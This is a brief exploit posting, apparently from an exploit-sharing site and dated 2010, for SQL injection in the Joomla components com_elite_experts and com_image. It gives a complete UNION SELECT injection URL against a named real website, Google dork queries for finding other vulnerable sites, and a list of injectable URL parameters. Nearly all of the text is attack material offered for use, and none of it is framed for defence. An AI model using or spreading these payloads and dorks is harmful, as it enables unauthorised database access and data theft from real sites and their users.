http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+--+
Dopk:
inurl:"option=com_elite_experts"
// Doesn't look like old news...
joomla image_com Blind Sql Injection
Dork
inurl:"com_image"
Code
site/patch/index.php?option=com_image&view=[sqli]
site/patch/index.php?option=com_image&Itemid=87&gallery=[sqli]
site/patch/index.php?option=com_image&view=image&Itemid=[sqli]
site/patch/index.php?option=com_image&page=[sqli]
© Inj3ct0r.com [2010-06-14]